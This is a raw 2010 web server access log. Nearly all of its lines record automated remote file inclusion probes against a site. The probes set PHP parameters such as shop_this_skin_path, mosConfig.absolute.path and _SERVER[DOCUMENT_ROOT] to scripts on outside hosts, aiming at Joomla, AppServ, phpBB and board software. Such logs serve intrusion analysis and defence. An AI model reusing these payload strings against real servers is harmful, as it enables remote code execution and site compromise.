61.63.82.14 - - [13/Feb/2010:07:59:01 -0800] "GET /logs/access_100115.log//board.php?code=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [13/Feb/2010:07:59:20 -0800] "GET /logs/access_100115.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.124.127.77 - - [13/Feb/2010:07:59:37 -0800] "GET /logs/access_100111.log%20%20//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.transchool.com/n/data/session/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:07:59:37 -0800] "GET /logs/access_100112.log%20%20//board.php?code=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:07:59:40 -0800] "GET /logs//board.php?code=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.124.127.77 - - [13/Feb/2010:07:59:49 -0800] "GET /logs/access_100114.log%20%20//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.transchool.com/n/data/session/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [13/Feb/2010:07:59:59 -0800] "GET /logs/access_100126.log//?errors.php=http://www.sigok.ms.kr/bbs//new_name???????????? HTTP/1.0" 404 5258 "-" "libwww-perl/5.53" "www.puaga.com"
62.193.216.73 - - [13/Feb/2010:08:00:00 -0800] "GET /?errors.php=http://www.sigok.ms.kr/bbs//new_name???????????? HTTP/1.0" 200 3626 "-" "libwww-perl/5.53" "www.puaga.com"
62.193.216.73 - - [13/Feb/2010:08:00:00 -0800] "GET /logs//?errors.php=http://www.sigok.ms.kr/bbs//new_name???????????? HTTP/1.0" 200 4788 "-" "libwww-perl/5.53" "www.puaga.com"
216.36.59.85 - - [13/Feb/2010:08:00:17 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [13/Feb/2010:08:00:17 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [13/Feb/2010:08:00:18 -0800] "GET /logs/access_100104.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [13/Feb/2010:08:00:34 -0800] "GET /logs/access_100115.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [13/Feb/2010:08:00:46 -0800] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.222.129.18 - - [13/Feb/2010:08:00:57 -0800] "GET /logs/access_100127.log//////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.222.129.18 - - [13/Feb/2010:08:00:57 -0800] "GET /logs//////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 200 4812 "-" "Mozilla/5.0" "www.puaga.com"
67.222.129.18 - - [13/Feb/2010:08:00:57 -0800] "GET /////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [13/Feb/2010:08:01:21 -0800] "GET //navigation.php?skin_board_path=http://www.sigok.ms.kr/bbs//new_name???????????? HTTP/1.0" 404 5258 "-" "libwww-perl/5.53" "www.puaga.com"
62.193.216.73 - - [13/Feb/2010:08:02:13 -0800] "GET /logs/access_100126.log///navigation.php?skin_board_path=http://www.sigok.ms.kr/bbs//new_name???????????? HTTP/1.0" 404 5258 "-" "libwww-perl/5.53" "www.puaga.com"
62.193.216.73 - - [13/Feb/2010:08:02:14 -0800] "GET //navigation.php?skin_board_path=http://www.sigok.ms.kr/bbs//new_name???????????? HTTP/1.0" 404 5258 "-" "libwww-perl/5.53" "www.puaga.com"
62.193.216.73 - - [13/Feb/2010:08:02:14 -0800] "GET /logs///navigation.php?skin_board_path=http://www.sigok.ms.kr/bbs//new_name???????????? HTTP/1.0" 404 5258 "-" "libwww-perl/5.53" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:02:18 -0800] "GET /logs/access_100117.log%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:02:18 -0800] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:02:18 -0800] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:02:20 -0800] "GET /logs/access_100117.log%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:02:20 -0800] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:02:20 -0800] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
211.108.61.176 - - [13/Feb/2010:08:02:21 -0800] "GET /logs/access_100125.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.222.129.18 - - [13/Feb/2010:08:02:26 -0800] "GET /logs/access_100111.log//////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:02:57 -0800] "GET /logs/access_100204.log%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:03:14 -0800] "GET /logs/access_100204.log%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [13/Feb/2010:08:05:05 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [13/Feb/2010:08:05:05 -0800] "GET /logs/access_100115.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [13/Feb/2010:08:05:05 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [13/Feb/2010:08:05:06 -0800] "GET /logs/access_100126.log//?errors.php=http://www.sigok.ms.kr/bbs//new_names??????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
210.114.222.95 - - [13/Feb/2010:08:05:07 -0800] "GET /?errors.php=http://www.sigok.ms.kr/bbs//new_names??????? HTTP/1.1" 200 3642 "-" "libwww-perl/5.79" "www.puaga.com"
210.114.222.95 - - [13/Feb/2010:08:05:08 -0800] "GET /logs//?errors.php=http://www.sigok.ms.kr/bbs//new_names??????? HTTP/1.1" 200 4804 "-" "libwww-perl/5.79" "www.puaga.com"
216.17.109.216 - - [13/Feb/2010:08:05:24 -0800] "GET /logs/access_100127.log%20%20//////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [13/Feb/2010:08:05:24 -0800] "GET /logs//////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 200 4812 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [13/Feb/2010:08:05:24 -0800] "GET /////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [13/Feb/2010:08:05:32 -0800] "GET /logs/access_100126.log///navigation.php?skin_board_path=http://www.sigok.ms.kr/bbs//new_names??????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
210.114.222.95 - - [13/Feb/2010:08:05:33 -0800] "GET //navigation.php?skin_board_path=http://www.sigok.ms.kr/bbs//new_names??????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
210.114.222.95 - - [13/Feb/2010:08:05:34 -0800] "GET /logs///navigation.php?skin_board_path=http://www.sigok.ms.kr/bbs//new_names??????? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
216.119.103.12 - - [13/Feb/2010:08:05:38 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [13/Feb/2010:08:05:38 -0800] "GET /logs/access_100123.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [13/Feb/2010:08:05:38 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [13/Feb/2010:08:06:04 -0800] "GET /logs/access_100111.log%20%20//////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.250.252.242 - - [13/Feb/2010:08:06:28 -0800] "GET / HTTP/1.1" 200 2392 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.pixero.net"
213.239.230.130 - - [13/Feb/2010:08:06:30 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://detiinfo.ru//mambots/system/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.puaga.com"
213.239.230.130 - - [13/Feb/2010:08:06:31 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://detiinfo.ru//mambots/system/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.puaga.com"
216.36.59.85 - - [13/Feb/2010:08:06:48 -0800] "GET /logs/access_100103.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [13/Feb/2010:08:06:58 -0800] "GET /bbs//config/dbutil.bck.php?confdir=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [13/Feb/2010:08:06:58 -0800] "GET /logs//bbs//config/dbutil.bck.php?confdir=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [13/Feb/2010:08:06:58 -0800] "GET /logs/access_100125.log%20%20//bbs//config/dbutil.bck.php?confdir=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.222.129.18 - - [13/Feb/2010:08:07:26 -0800] "GET /logs/access_100204.log//////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.139 - - [13/Feb/2010:08:07:42 -0800] "GET /logs/access_100104.log//administrator/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:07:46 -0800] "GET /logs/index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:07:46 -0800] "GET /logs/access_100109.log%20%20/index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:07:47 -0800] "GET /index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [13/Feb/2010:08:07:48 -0800] "GET /logs/access_100126.log//appserv/main.php?appserv_root=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [13/Feb/2010:08:07:48 -0800] "GET /logs//appserv/main.php?appserv_root=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [13/Feb/2010:08:07:48 -0800] "GET /appserv/main.php?appserv_root=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [13/Feb/2010:08:07:52 -0800] "GET /logs/access_100104.log%20%20//bbs//config/dbutil.bck.php?confdir=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [13/Feb/2010:08:07:55 -0800] "GET /appserv/main.php?appserv_root=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [13/Feb/2010:08:07:55 -0800] "GET /logs//appserv/main.php?appserv_root=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.225.60 - - [13/Feb/2010:08:07:55 -0800] "GET /logs/access_100126.log//appserv/main.php?appserv_root=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [13/Feb/2010:08:08:02 -0800] "GET /logs/access_100119.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [13/Feb/2010:08:08:02 -0800] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [13/Feb/2010:08:08:02 -0800] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [13/Feb/2010:08:08:04 -0800] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [13/Feb/2010:08:08:04 -0800] "GET /logs/access_100119.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [13/Feb/2010:08:08:04 -0800] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:08:08:28 -0800] "GET /logs/access_100126.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [13/Feb/2010:08:08:35 -0800] "GET /logs/access_100115.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.55.231.66 - - [13/Feb/2010:08:08:41 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "www.atesh.info"
65.55.231.66 - - [13/Feb/2010:08:08:41 -0800] "GET /atesh_info/nt.php?t=1734069740 HTTP/1.1" 200 61 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "www.atesh.info"
216.36.59.85 - - [13/Feb/2010:08:08:45 -0800] "GET //write_comment_update.php?board_skin_path=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [13/Feb/2010:08:08:45 -0800] "GET /logs/access_100112.log///write_comment_update.php?board_skin_path=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [13/Feb/2010:08:08:45 -0800] "GET /logs///write_comment_update.php?board_skin_path=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [13/Feb/2010:08:08:59 -0800] "GET /lib/Loggix/Module/Calendar.php?pathToIndex=http://www.sigok.ms.kr/bbs//new_name???????????? HTTP/1.0" 404 5258 "-" "libwww-perl/5.53" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:08:09:30 -0800] "GET /logs/access_100109.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [13/Feb/2010:08:09:31 -0800] "GET /logs/access_100118.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [13/Feb/2010:08:09:44 -0800] "GET /logs/access_100118.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:08:10:15 -0800] "GET /appserv/main.php?appserv_root=http://hannelore.org//////webart/mambots/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:08:10:15 -0800] "GET /logs/appserv/main.php?appserv_root=http://hannelore.org//////webart/mambots/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:08:10:15 -0800] "GET /logs/access_100126.log/appserv/main.php?appserv_root=http://hannelore.org//////webart/mambots/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:10:28 -0800] "GET /logs/access_100117.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:10:29 -0800] "GET /logs/access_100117.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:10:35 -0800] "GET /logs/access_100204.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [13/Feb/2010:08:10:36 -0800] "GET /logs/access_100204.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:11:08 -0800] "GET /logs/access_100120.log%20%20/index.php?conteudo=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [13/Feb/2010:08:12:05 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://bangsal17.ucoz.com/tcl/goid.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [13/Feb/2010:08:12:05 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://bangsal17.ucoz.com/tcl/goid.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [13/Feb/2010:08:12:05 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://bangsal17.ucoz.com/tcl/goid.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:12:06 -0800] "GET /board.php?code=http://www.parisplayground.com/paris/amateur/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:12:06 -0800] "GET /logs//board.php?code=http://www.parisplayground.com/paris/amateur/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:08:12:06 -0800] "GET /logs/access_100124.log/appserv/main.php?appserv_root=http://hannelore.org//////webart/mambots/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:08:12:07 -0800] "GET /logs/access_100126.log/appserv/main.php?appserv_root=http://hannelore.org//////webart/mambots/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:08:12:07 -0800] "GET /logs/appserv/main.php?appserv_root=http://hannelore.org//////webart/mambots/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [13/Feb/2010:08:12:07 -0800] "GET /appserv/main.php?appserv_root=http://hannelore.org//////webart/mambots/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [13/Feb/2010:08:12:08 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://bangsal17.ucoz.com/tcl/goid.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [13/Feb/2010:08:12:08 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://bangsal17.ucoz.com/tcl/goid.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [13/Feb/2010:08:12:08 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://bangsal17.ucoz.com/tcl/goid.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [13/Feb/2010:08:12:08 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://bangsal17.ucoz.com/tcl/goid.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [13/Feb/2010:08:12:08 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://bangsal17.ucoz.com/tcl/goid.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [13/Feb/2010:08:12:08 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://bangsal17.ucoz.com/tcl/goid.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [13/Feb/2010:08:12:09 -0800] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://bangsal17.ucoz.com/tcl/goid.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [13/Feb/2010:08:12:09 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://bangsal17.ucoz.com/tcl/goid.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [13/Feb/2010:08:12:10 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://bangsal17.ucoz.com/tcl/goid.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:08:12:11 -0800] "GET /logs/access_100112.log%20%20//board.php?code=http://www.parisplayground.com/paris/amateur/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [13/Feb/2010:08:12:20 -0800] "GET /logs/access_100202.log//?_SERVER[DOCUMENT_ROOT]=http://bangsal17.ucoz.com/tcl/goid.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
